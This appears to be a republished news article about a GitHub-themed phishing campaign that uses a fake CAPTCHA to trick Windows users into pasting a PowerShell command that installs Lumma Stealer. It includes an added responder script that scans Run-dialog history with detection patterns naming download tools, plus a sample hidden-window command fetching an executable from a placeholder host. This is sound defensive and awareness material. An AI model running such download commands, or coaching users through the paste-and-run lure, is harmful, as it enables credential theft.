CyberSecurity SEE

The Windows PowerShell Phish Has Scary Potential – Krebs on Security

Many GitHub users found themselves at risk this week as they received a sophisticated phishing email pretending to be a security alert from the popular code hosting platform. The email urged users to click on a link to address a security vulnerability in their repository, leading them to a website that asked them to prove they were human by completing a series of tasks.

The email, which spoofed GitHub’s security team, warned users of a security issue in their code and directed them to visit a website to get more information. Upon visiting the site, users were prompted to solve a CAPTCHA to prove they were human. However, the CAPTCHA was a guise for a more malicious scheme.

After clicking the “I’m not a robot” button, users were asked to perform three sequential steps to verify their humanity. The first step required users to press the Windows key and the letter “R” simultaneously, opening a Windows “Run” prompt, which executes whatever program is specified in it.

The second step instructed users to press the “CTRL” key and the letter “V” simultaneously, pasting malicious code from the website’s virtual clipboard. Finally, pressing the “Enter” key in the third step would launch a PowerShell command, downloading and executing a malicious file called “l6e.exe” from a specific website.

PowerShell, a powerful automation tool built into Windows, was used in this phishing campaign to download a password-stealing malware known as Lumma Stealer. This malware is designed to gather credentials stored on the victim’s PC, posing a significant security threat.
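For responders checking whether a user followed these three steps, the following added example (not part of the original article) reads the current user's Run-dialog history and flags entries that look like a pasted download command. It relies on the RunMRU registry key, where Explorer records Run-dialog input; the key is a standard Windows artifact the article does not name, and the match patterns and sample strings are assumptions constructed for illustration.

```powershell
# Added example: triage the Win+R history of the current user.
# Explorer stores each Run-dialog entry under RunMRU as a value named
# a, b, c, ... whose data ends with the terminator "\1".
$RunMruPath = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'

# Assumed heuristics (tune for your environment): a script host or download
# utility combined with a URL, a web-fetch cmdlet, or a hidden/encoded switch.
$HostPattern  = '(?i)\b(powershell|pwsh|mshta|cmd|curl|bitsadmin|certutil)(\.exe)?\b'
$FetchPattern = '(?i)(https?://|\b(iwr|irm|iex|invoke-webrequest|invoke-expression)\b' +
                '|-enc(odedcommand)?\b|\s-w(indowstyle)?\s+h)'

function Test-RunMruEntry {
    param([Parameter(Mandatory)][string]$Command)
    $clean = $Command -replace '\\1$', ''   # strip the RunMRU terminator
    [pscustomobject]@{
        Suspicious = ($clean -match $HostPattern) -and ($clean -match $FetchPattern)
        Command    = $clean
    }
}

function Get-RunMruEntry {
    # Returns nothing when the key is missing (no Run history, or not Windows).
    if (-not (Test-Path $RunMruPath)) { return @() }
    (Get-ItemProperty -Path $RunMruPath).PSObject.Properties |
        Where-Object { $_.Name -match '^[a-z]$' } |   # skips MRUList and PS* metadata
        ForEach-Object { [string]$_.Value }
}

# Constructed sample values, used only when no real history is available.
# The URL and file name are placeholders, not indicators from the campaign.
$samples = @(
    'notepad\1',
    'cmd\1',
    'powershell -w hidden -c "iwr https://example.invalid/PLACEHOLDER.exe -OutFile x.exe"\1'
)

$entries = @(Get-RunMruEntry)
if ($entries.Count -eq 0) { $entries = $samples }

$entries | ForEach-Object { Test-RunMruEntry -Command $_ } |
    Sort-Object Suspicious -Descending |
    Format-Table -AutoSize -Wrap
```

A flagged entry is a lead, not a verdict: confirm it against process-creation and PowerShell script-block logs before treating the host as compromised.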

While this phishing attempt may not have fooled seasoned programmers who are familiar with these key commands, it could easily deceive less tech-savvy individuals. This raises concerns about the potential success of similar scams targeting average Windows users who may not be aware of such security risks.

In light of this, it is essential to educate users about the dangers of phishing attacks and the importance of cybersecurity awareness. While disabling or restricting PowerShell for end users could mitigate some risks, Microsoft advises against such actions due to the potential impact on system functionality.

It is crucial to stay vigilant and informed about cybersecurity threats to protect oneself and others from falling victim to phishing scams. Sharing articles like this with less tech-savvy individuals can help raise awareness and prevent future incidents of malware attacks through deceptive emails.

As cyber threats continue to evolve and become more sophisticated, users need to be proactive in safeguarding their online security. By staying informed and practicing safe online habits, individuals can reduce the risk of falling prey to malicious schemes like this phishing attack disguised as a security alert from GitHub.
